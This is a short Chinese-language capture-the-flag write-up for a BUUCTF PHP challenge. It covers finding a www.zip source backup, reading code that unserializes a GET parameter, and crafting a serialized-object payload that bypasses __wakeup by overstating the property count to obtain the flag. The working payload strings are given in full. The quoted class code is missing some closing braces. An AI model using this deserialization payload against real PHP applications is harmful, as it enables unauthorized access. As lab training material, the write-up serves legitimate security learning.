buuctf-web-[极客大挑战 2019]PHP 1

知识点：文件备份、反序列化

打开网站后发现源码没有提示，页面提示“备份的好习惯”，用御剑扫后台，扫出www.zip，打开发现有几个php文件

打开index.php发现关键代码

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);//反序列化
?>

打开class.php看代码

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;

读代码可以发现只有当username=admin,password=100时才能得到flag。但我们要绕过wakeup，不然username就会变成guest。

绕过方法：让对象属性的个数的值大于真实的属性个数

构造payload：?select=O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

发现错误，原来是漏了空格，修改一下就可以得到flag了

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}